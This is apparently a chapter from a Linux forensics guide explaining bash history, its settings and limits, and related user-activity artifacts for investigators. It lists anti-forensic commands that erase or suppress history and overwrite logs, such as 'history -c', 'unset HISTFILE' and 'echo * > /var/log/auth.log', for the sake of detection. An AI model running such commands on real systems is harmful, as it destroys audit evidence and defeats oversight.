Bash history is one of the most valuable sources of user activity evidence on Linux systems. It records commands typed by users in the terminal, making it extremely useful for reconstructing actions taken by administrators, normal users, or attackers. Along with other user-level artifacts, bash history helps build an accurate picture of what happened on a system, when it happened, and potentially who executed it.

This chapter explains how bash history works, where it is located, how attackers manipulate it, and what additional user activity artifacts investigators should examine.

Bash History Overview

Most Linux shells record executed commands in a history file.
For the standard Bash shell, this file is:

/home/<user>/.bash_history

and for the root user:

/root/.bash_history

Every command the user enters is stored here after they log out of the session.

How Bash History Works

Commands executed in a terminal are stored in memory while the user is logged in.
When the user logs out:

Commands are written to .bash_history
Older entries are shifted based on history size
Environment variables control what gets saved

Key environment variables:

HISTFILE

Path of the history file (~/.bash_history)

HISTSIZE

Number of commands kept in memory during the session

HISTFILESIZE

Maximum number of lines stored in the history file

HISTCONTROL

Controls duplicate entries, ignores commands starting with space, etc.

Example:

HISTCONTROL=ignoreboth

Forensic Value of Bash History

Bash history can reveal:

Commands used for system administration
Installation or execution of malware
Data exfiltration commands (scp, rsync, curl, wget)
Creation or deletion of users
Privilege escalation attempts
Clearing of logs or evidence
Suspicious shell scripts
File downloads
Persistence setup (cron, systemctl, ssh keys)

Investigators can use bash history to reconstruct every major action performed by a user.

Limitations of Bash History

Bash history does not record:

Timestamps by default
Commands executed via GUI
Commands run by scripts
Commands executed with sudo (unless configured)
Commands that start with a space (if ignoreboth/ignorespace enabled)

Attackers often try to disable or manipulate bash history.

Timestamps in Bash History

By default, bash does not store timestamps, but timestamps can be enabled via:

export HISTTIMEFORMAT="%F %T "

When enabled, entries look like:

#1709829300
ls -la
#1709829321
cat /etc/passwd

The number after # is a UNIX timestamp.

If present, timestamps significantly improve timeline analysis.

Bash History Anti-Forensics

Attackers commonly attempt to hide their actions by manipulating bash history.

Common techniques:

1. Clearing history

history -c

2. Removing the history file

rm ~/.bash_history

3. Preventing logging during a session

unset HISTFILE

4. Preventing logging of the next command

Prefix with a space:

 ls /etc/

5. Disabling history temporarily

set +o history

6. Editing the `.bash_history` file manually

7. Overwriting the file with null bytes

> ~/.bash_history

Investigators should check timestamps, shell configuration files, and other logs to detect these manipulations.

Additional User Activity Artifacts

Bash history alone is not enough. Other system components also track user activity.

1. /var/log/auth.log or secure

Tracks:

Login attempts
Sudo usage
SSH access
Privilege escalation

This helps confirm whether commands in history were executed with elevated privileges.

2. .bash_logout, .bashrc, .profile

These files may contain:

Custom scripts
Malicious persistence
Aliases used to hide commands
Disabled history settings

Important to inspect for tampering.

3. SSH Artifacts

Known hosts

~/.ssh/known_hosts

Authorized keys

~/.ssh/authorized_keys

SSH history logs

In /var/log/auth.log

These indicate:

What systems the user connected to
Which systems connected inbound
Possible backdoor SSH keys

4. Cron Jobs

User-level cron jobs stored in:

/var/spool/cron/crontabs/<user>

and system-wide jobs in:

/etc/crontab

Attackers frequently use cron for persistence.

5. User Login Records (utmp, wtmp, btmp)

Commands:

who           # current logins
last          # login/logout history
lastb         # failed logins

Shows:

User session timelines
Failed/successful logins
Remote access attempts

6. Shell Command Logs (Auditd)

If auditing is enabled, Linux can log every command executed.

Files stored in:

/var/log/audit/audit.log

Useful for privilege escalation or sensitive command detection.

7. Zsh or Other Shell Histories

If the system uses another shell:

Zsh: ~/.zsh_history
Fish: ~/.local/share/fish/fish_history

Forensics should check all potential shells.

Techniques for Analyzing Bash History

1. Correlate history with logs

Match commands with:

auth.log
syslog
wtmp
cron logs

2. Identify suspicious commands

Look for:

wget/curl downloads
Adding SSH keys
chmod/chown changes
Adding users
Tar or zip usage (data staging)
SCP/rsync commands

3. Search for attacker patterns

Examples:

echo * > /var/log/auth.log
rm -rf /tmp/*
Commands starting with spaces
Disabled history settings

4. Recover deleted bash history

Techniques:

File carving (photorec, foremost)
Searching unallocated space
Checking journaled file systems (EXT4)
Reviewing backup or shadow copies

Summary

Bash history is a key source of user activity evidence on Linux systems. It records terminal commands, helping investigators reconstruct user actions, privilege escalation, file access, system modifications, and potential malicious behavior. Although attackers may attempt to manipulate or disable history, cross-checking with logs and other artifacts allows investigators to detect tampering and rebuild accurate timelines. Bash history, combined with SSH logs, cron jobs, login records, and audit logs, forms the foundation of Linux user activity forensics.